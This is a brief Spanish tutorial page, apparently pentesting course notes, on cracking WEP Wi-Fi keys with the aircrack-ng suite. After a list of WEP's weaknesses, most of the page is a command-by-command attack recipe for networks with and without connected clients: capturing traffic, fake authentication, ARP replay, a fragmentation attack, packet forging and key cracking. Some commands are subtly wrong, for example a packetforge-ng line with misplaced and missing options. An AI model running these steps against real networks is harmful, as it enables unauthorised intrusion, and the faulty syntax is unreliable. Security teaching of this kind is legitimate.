02.-Ataques a redes WEP
El uso de redes tipo WEP se considera obsoleto, aunque algunos dispositivos antiguos todavía utilizan este tipo de red Wi-Fi.
Usos¶
- Sistemas SCADA o equipamiento antiguo (fábricas, sistemas portuarios, etc.).
- Impresoras antiguas con conectividad Wi-Fi.
Problemas Asociados¶
- Utiliza el algoritmo RC4, vulnerable a ataques estadísticos.
- La clave de acceso tiene una longitud limitada (5-13 caracteres).
- Los clientes conectados tienen visibilidad entre ellos, lo que facilita ataques internos.
- Si no está segmentada, puede permitir fugas de información y accesos a otras redes.
Tipos de Ataque¶
Con Clientes Conectados¶
Monitorizar y capturar tráfico¶
$ airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w fichero_captura
Inyectar tramas de autenticación falsas¶
$ aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0
Repetir paquetes ARP para generar más vectores de inicialización¶
$ aireplay-ng -3 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0
Crackear la clave con aircrack-ng¶
$ aircrack-ng fichero_captura.cap
Sin Clientes Conectados¶
Monitorizar y capturar tráfico:¶
$ airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w fichero_captura
Generar tramas de autenticación falsas:¶
$ aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0
Realizar ataque de fragmentación para generar un paquete ARP fraudulento:¶
$ aireplay-ng -5 0 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0
Construir un paquete ARP con packetforge-ng:¶
$ packetforge-ng -0 AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 -k 255.255.255.255
Reenviar el paquete ARP generado:¶
$ aireplay-ng wlan0 -2 -r arp-packet
Crackear la clave con aircrack-ng:¶
$ aircrack-ng fichero_captura.cap
Para Saber Más¶
Consulta este video en YouTube para ver una explicación práctica sobre ataques WEP basados en fragmentación utilizando la suite aircrack-ng.